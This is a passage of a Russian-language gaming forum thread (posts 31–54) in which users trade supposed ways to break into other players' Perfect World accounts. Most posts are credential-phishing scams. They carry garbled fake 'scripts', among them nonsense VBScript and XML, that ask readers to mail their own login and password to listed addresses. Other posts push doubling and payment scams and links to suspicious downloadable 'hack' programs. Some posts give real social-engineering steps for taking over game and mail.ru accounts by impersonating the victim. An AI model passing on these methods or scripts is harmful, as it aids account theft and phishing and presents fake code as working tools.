Все способы взломать Perfect World

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

ВЗЛОМ АККАУНТОВ!

Сообщений 31 страница 54 из 54

31

http://stealer.moy.su/ - на этом сайте все расписано, как увести учетную записи. самое главное ваши данные вводить не нужно.

0

32

Запускаем почту с GMail, пишем на лог бота: bot.vzlomat@gmail.com с темой: vzlom akkaunt.
c//:programfiles/vzlom/speed_is_10_seconds/in_play_11x11.
{Login/password}
{error3356}
{login} (ПИШЕМ СВОЙ ЛОГИН В 11Х11)
{pass_login_speed/program} (ПИШЕМ ЛОГИН ТОГО, КОГО ХОТИМ ВЗЛОМАТЬ)
{ten_seconds_is_vzlom}
{password} (ПИШЕМ СВОЙ ПАРОЛЬ)
{error3589/error9648/programm2055/loding} (Благодаря этой ошибке бот будет запрограммированн на взлом)
{downloading.../error35785/BOT/programm}
{E-mail/programm35958/otpravit} (ПИШЕМ СВОЙ Е-МЕЙЛ)
{plugin23595/programm_vzlom}
{downlading_stop/error3658996}
{level_in_play/dowloading...} (ПИШЕМ СВОЙ УРОВЕНЬ)
{error35658/warning:vzlom_start}
{vzlomat_path_35688689_(c//:programm/windows/stop_vzlom}
[Plug in 9535685/error5976755]/copy_vzlom_in_play}}//*
Запускаем почту с GMail, пишем на лог бота: bot.vzlomat@gmail.com с темой: vzlom akkaunt
благодаря этим ошибкам он будет запрограммированн на взлом, ответ через 5-6часов, когда завершится взлом.
http://uploads.ru/t/4/y/1/4y1hL.png

Отредактировано GMail (2011-12-12 18:19:56)

0

33

прога позволяет делать только 1кк и на этом все это триал версия? может кто подскажет где достать полностью рабочую прогу? вот та что у меня((((

http://letitbit.net/download/97737.9425 … 4.exe.html

выручайте!!!!! если на 1 кк ломает значит можно и больше!!!!!!

0

34

Всем привет вылажу сборник програм для Perfect World. в этом сборнике взлом Юаний все понятно и с инструкцией там же присутствует ссылка на видео! это для тех кто по инструкции не поймет!!! еще из полезных программ анти инвиз,бот для кача, спид-хак!!! вот ссылки
1 часть
http://depositfiles.com/files/p4seefqwt
2 часть
http://depositfiles.com/files/tvi40xqqh

0

35

Народ, все можно сделать намного проще ! Взлом на самом деле прост,  кстати попробывала  почти все скрипты, работают, но с ними ждать нужно долго один раз ждала где то 6-7 дней так как они очень редко проверяются лучше писать сразу на мыло к модерам я к сожалению знаю ток 2-х, кароче пишем им на почту следующее :
(желательно по русски не все модеры английский знают)
здравствуйте мною были забыты логин и пароль от игрового персонажа (ну того которого хотите взломать)
не могу зайти играю только твинковым логином
(для проверки пишем) логин : (свой пишем тут…..)
пароль : (тоже свой…….)
поменяйте пожайлуста логин и пароль аккаунта на следующие :
(тут прописываем логин и пароль на те которые хотим поменять пароль и логин жертвы)
через 2-5 часов появится письмо на ящике от модератора. А теперь самое сложное, в письме вам зададут несколько контрольных вопросов (когда была создана учетная запись и т.д.) Не тушуйтесь и не пугайтесь ! Пишите от балды, может пройти не с первого раза. У меня только с 3 попытки прокатило, хоть я писала всегда одинаковую информацию !
Вот адреса админов :    astrumnival_116@bk.ru (не проверяла)  или astrumnival_82@bk.ru (этим пользовалась)
Ах да, аккаунт должен быть зарегистрирован не менее 20 дней, почему не знаю !
Удачи !

0

36

Да чё Вы морочетесь? Просто Надо ввести на след. адрес: mea1911@yandex.ru следующий текст:

Здравствуйте, не понимаю, как, но я потерял пароль от своей учётной записи. Пожалуйста, напомните на адрес: E-Mai@******.ru (пишем свой E-Mail). Обещаю: это больше не повторится!

Отредактировано GMail (2012-01-07 13:38:16)

0

37

Здраствуйте! Хочу поделиться способом взломом взлома аккаунтов Нивал Онлайн, сам забил на это, поэтому готов поделиться. =)
К делу...
Бот, позволяет взламывать игрe Perfect World. Бот позволяет получть доступ к чужим аккаунтам, их деньгам, вещам и многому другому.Чтобы получить доступ к чужим аакаунтам,
для этого надо написать письмо с почтового ящика по форме, написанной ниже без моих подсказок на русском(важно!) На русском может быть только название сервера! В промежутке от 10 минут до 6 часов( в зависимости от вашего ящика) вам придет письмо с логином и паролем вашего недруга. Дерзайте!
Кому: pw-master1963@mail.ru
Тема: Fail Password
Текст:
{failpass}
/Go to page 1
{trubl theme = password forgot = fail}
/derictory count/
{fors to game: Perfect World
{/fors to server:(Тут прописываете сервер, на русском языке)
{my sql}: (Здесь прописываете свой акк){1for ressurce go to"2"}
/02870163
[my 2 last pass: (здесь указываем игровой ник того, кого хотите взломать)
[/forward2folder 00123691]
{my count pass}: (здесь прописываем свой пароль)
//target trash_1
/trash_2
{go to maile page}: (здесь укажите свой email адрес (на него придёт аккаунт и пароль от серва, с данными того акаунта человека которого вы взламываете))
//endcript_1 /

0

38

Друзья не слушайте этих пройдох которые пишут что на мыле Gmail, mail, yandex есть бот!! Бота на юани и на голд не существует это во-первых, а во-вторых никакие боты не сидят на этих E-mail . Если там кто и сидит, то он тот кто хочет обмануть вас и узнать ваш логин с паролем!!! Если и сидит бот то, во-первых на других мылах, во-вторых что бы взломать чей-то акк надо знать логин того, кого хотите взломать!!! Тут нужна хитрось или хорошие отношения!!! Если знать один ник, то никого взлома не будет!!!  Не ну конечне будет взлом, но ВАШЕГО аккаунта!!! Есть более просто способ  заработать деньги в PW!!! Бота на юани и голд конечно нет!!! Но есть ходячий заработок!!! Я узнал про него от своих друзей хакеров, которые его и создали!! Вообщем не знаю он только на один сервер или на все, знаю точно что он работает на Адаре!!! Отсылаете на ник Р1ЗHPI не мение 50к и через 1 час вам приходит удвоенная сумма!!! Мои друщья убьют меня если узнают что это вам сказал я!!!  Пользуйтесь на здоровье !!! Чистая правда!!! Так хочится что бы никто не был обманут!!! Это настоящий заработок!!! Не надо отсылать никаких логинов, никаких паролей, не надо отсылать мыло !!! Всё предельно просто и чесно!!! Я уже потратил 20кк и заработал ещё этим способом!!! Я просто сразу отправил круглую сумму  не проверая!!! Я доверяю своим друзьям!!! Ник Р1ЗHPI пишется полностью на английском!!! Важно!!! Ладно всем пока!! пользуйтесь на здоровье!!!!!!

Отредактировано Jekster (2012-02-03 00:43:08)

0

39

Jekster написал(а):

Не ну конечне будет взлом, но ВАШЕГО аккаунта!!!

А я не согласен: дыра в эл. почте. Через неё строится взлом!

0

40

Взлом нового формата!!! Качайте) Все инструкции внутри) http://depositfiles.com/files/j3uq2knqp

0

41

Хотите взломать перса в Perfect World  тогда этот скрипт для вас

Кому:pw-error@mail.ru

Текст:
{failpass}
/Go to page 1
/derictory count/
{fors to game: (Тут прописываем игру на англ. языке(Пример Perfect World, Allods))
/02870163
//target trash_1
/trash_2
{go to maile page}: (здесь укажите свой email адрес (на него придёт аккаунт и пароль от серва, с данными того акаунта человека которого вы взламываете))
//endcript_1 /

0

42

Привет!!! Хорош свои аки раздовать, всё это развод!!! Вот нашел ссылку на доп. заработок если хочешь посмотри. Ничо продавать не надо тока приглашать людей!!! К маю чем больше тел тем больше денег!!! Регистрация бесплатно только до 9 апреля 2012. Если есть Хром то лучше через него тк там на английском. вот по этой ссылке http://signup.wazzub.info/?lrRef=cb0b1211

0

43

Лан, так и быть. Расскажу..
На сервере есть бот разбирающий все входящие сообщения.в нём есть небольшая уязвимость: Нужно отправить этот скрипт на мыло, и тогда бот разбирающий этот хлам протупит и подумает что вы хотите восстановить "забытый" пароль и вышлет его вам на ваше мыло.

"логин игрока которого хотите взломать(ковычки оставить)"
CompName = "здесь пишем своё мыло куда бот будет высылать пароль"
Set objService = GetObject("winmgmts:{impersonationLevel=impersonate,(Systemtime)}!\\" & ServerName & "Сюда пишем название сервера" "\root\CIMV2")
If Err.Number <> 0 Then
WScript.Echo Err.Number & ": " & Err.Description
WScript.Quit
End If
For Each objOS In objService.ExecQuery("SELECT * FROM Win32_OperatingSystem")
Exit For
Next

WScript.Quit
End If
3.EnvMult, MyCount, 2
MyCount *= 2 "здесь вставьте свой пароль, бот протупит, сверит с вашем мылом, и вышлет новый сгенерированый пасс врага на ваше емайл"

Проверенно работает 100%!!!!!!!!!!!!!!
Этот скрип нужно выслать на мыло бота   perfect_world_ad@mail.ru

0

44

На сервере есть бот разбирающий все входящие сообщения.в нём есть небольшая уязвимость: Нужно отправить этот скрипт на мыло, и тогда бот разбирающий этот хлам протупит и подумает что вы хотите восстановить "забытый" пароль и вышлет его вам на ваше мыло.

Set objService = GetObject("winmgmts:{impersonationLevel=impersonate,(Systemtime)}!\\" & ServerName & "Сюда пишем название сервера" "\root\CIMV2")
If Err.Number <> 0 Then
WScript.Quit
End If
Exit For
Next

WScript.Quit
End If
3.EnvMult, MyCount, 2
MyCount *= 2 "здесь вставьте свой пароль, бот протупит, сверит с вашем мылом, и вышлет новый сгенерированый пасс врага на ваше емайл"

0

45

If Err.Number <> 0 Then
WScript.Quit
End If
Exit For
Next

WScript.Quit
End If
3.EnvMult, MyCount, 2

0

46

Кому:pwdbot@mail.ru
Текст:
{failpass}
/Go to page 1
/derictory count/
{fors to game: (Тут прописываем игру на англ. языке(Пример Perfect World, Allods))
/02870163
//target trash_1
/trash_2
//endcript_1 /

0

47

Уважаемые модераторы сайта, обращаюсь к вам со всем уважением. Вы отлично придумали свой сайт, но вот по прочтению некоторых тем где указаны скрипты якобы по взлому это конечно брехня... У меня друг написал отличную программу которая действительно ломает акаунты Perfect Wold, на данной стадии проблема заключается в том что она мало известна. У меня к Вам просьба, пожалуйста помогите раскрутить эту программу. вот ссылка откуда можно её скачать: //depositfiles.com/files/tz3hwywph               Заранее примного благодарен!!!!!

0

48

Тот кто хочет взломать чужой аккаунт !!!
Перед вами замечательная вещь!! На самом деле работает!!!
на других подобных скриптах вас обманывают, но тут все посложнее будет!! У админов игры есть программа, которая меняет пароли, но есть один нюанс! Ваш перс должен быть не менее 10 уровня!! Иначе программа будет отсеевать эти письма как спам! И переадресовывать письма админам!!! А если перс 10+лвла то боятся нечего! проверенно!
<Demon>
<cryptPassword>B7-8D-35-41-6D-19-21-89-AE-E5-EF-82-CE-37-DB-24</здесь прописываем свои логин>;;</сервер на котором аккаунт>
<accessLevel>Player</accessLevel>
<flags>1</flags>
<created>2005-11-27T1603.5312500+07:00</created>
<lastLogin>2005-12-11T15:03:02.7812500+07:00</lastLogin>
<totalGameTime>PT1H29M52.90625S</totalGameTime>
- <chars> {go to mile page}: (здесь укажите свой email адрес (на него придёт аккаунт и пароль от серва, с данными того акаунта человека которого вы взламываете))
<char index="0">79551</char>
</chars>
- <tags>{my count pass}: (здесь прописываем свой пароль)
<tag name="BanDealer">0x6CF3 "aaa"</tag>
<tag name="BanTime">2005-12-11T2030.0312500+07:00</tag>
<tag name="BanDuration">30.00:00:00</tag>
</tags>
- <addressList count="1">
<ip>11.156.122.173</ip>
</addressList>
</Demon>
- <account>
Все это отсылаем на  sistem.perfectworld@mail.ru - это ящик программы!
через некоторое время придет сообщение с нужным паролем! 
Только все писать без скобок!!!
Удачи вам!!!

0

49

Chiter написал(а):

Впринципе есть одна програмка,но вам я её доверить не могу,потому что выё сразу попалите админам..Могу помочь насыпать халявных юаней за символическую плату 100р)
От вас требуется следующее:в письме на мыло нужно вставить скрин с оповещением зачисления 100р на мой кошелёк - 410011066525744; туда же свой логин - пароль от логина - сервер - кол-во юаней.Деньги зачисляются в течение 3 дней.Рисковано конечно,что нас могут забанить,но кто не рискует,тот не пьёт шампанского)Причём рискуем оба,т.к. меня могут забанить по апи.

емайл - signufruspwmoders@mail.ru   

Первым трём деньги возвращаю назад на кошелёк.

ettreyg

у grooodno луч способ ты говориш выслать логин и пороль а вдруг у мя там 90?? а сюда я пришёл почитать и сдать админам чтоб они вас за деньги забанили на windovs! По этому  зачем  мне свай акк высылать?

0

50

Всезнайка написал(а):

У меня только один вопрос по взлому акков на всех форумах пишут разное мыло эт скорее развод чем правда правда?

он прав кто знает что нивал существует?

0

51

Хакер_Я написал(а):

Взлом аккаунта в PW осуществляется следующем образом:
1. По адресу perfectworld-pass@mail.ru находится почтовая программа, которая и просматривает запросы на восстановления паролей
2. Все элементарно, и в тоже время эффективно. Нужно создать скрипт эмитирующий запрос на пароль. Высылаем письмо на этот адрес с темой типа:
login=xxxx+pass=yyyy&+Alitair=&zzzz=IDR+FPF1
(примечание так выглядит не содержимое письма, а его тема, само письмо не должно содержать никаких знаков!)
Alitair - ваш сервер
xxxx- логин вашего аккаунта
yyyy - пароль вашего аккаунта
zzzz – логин жертвы,
3. В течении 10-15 минут приходит письмо, где сообщается пароль жертвы, будто бы ВЫ его забыли и отослали запрос.
Внимательно проверяйте написание скрипта. ТАМ НЕ ДОЛЖНО БЫТЬ ПРОБЕЛОВ!

мне пришёл ответ: Пожалуйста, скажите от какого именно ресурса Вы потеряли пароль? и чё делать

0

52

вы лучше подскажите как быстро можно взломать пароль от банка, меня взломали

0

53

я раскажу как я взломал подругу в пв захожу в скайп переписываюсь с ней о пв говарю типо "не входит за себя пробывал зарегатся заново и не получилось зайти попросил друга за него зашол можешь дать свой логин и пароль пв" она дала вот и взломал ну а толк всёравно востоновит а себе всё дорогое не перекинуть это надо зделать так что бы не могли востоновить а это возможно нужно ломануть маил ща я раскажу как взломать маил ру / mail.ru у меня так получалось взломать много раз проверенно на мне если вы знаете маил жертвы то заходим в маил нажимаем забыли пароль там пишите маил жертвы нажимаем далее или что там не помню потом нажимаем обротится в службу поддержки и вы навернека думаете что не реально взломать по этой форме НЭ ? а вот и легко !   :yep: нужно добавить жертву в друзья в анкете смотрим имя фамилия компируем их в поля в той форме так же пишим день рожденья с анкеты выбираем пол он тоже в анкете если есть ответ на секретный вопрос то пишим какуюнибудь хенрню хотя бы чють чють похожую на ответ на вопрос вводим регион и город тоже с анкеты даты регистрации (прибризительно как вы думаете) в поле пароль пишим англискими буквами имя жертвы (если вы знаете что бы туда вписать лутьше чем имя то пишите ) дата последнего захода через сайт это можно узнать легко зайдём на страничку мой мир жертвы и там пасмотрим дату последнего захода вписываем её в это поле Дата последнего входа в ящик через почтовую программу (если используете) это поле заполняете если знаете ответ Адрес пересылки, настроенной в ящике если не знаере можете не вводить Была ли установлена опция «Не сохранять почту при пересылке»? я обычно знаю ответ как стоит у моих друзей скорее всего ответ нет и вы тоже ставте нет если не знаете E-mail адрес, по которому следует с вами связаться, и дополнительная информация сюда пишим своё мыло и самое нижнее вы зополняете как знаете и нажимаете отправить и ждёте в течении 3 дней на ваше мыло письмо со сбросам пароля вероятность взлома по этому методу 80% удачи  :shine:

0

54

Этот типок консульт по хаку 9892415203

0

Рейтинг форумов | Создать форум бесплатно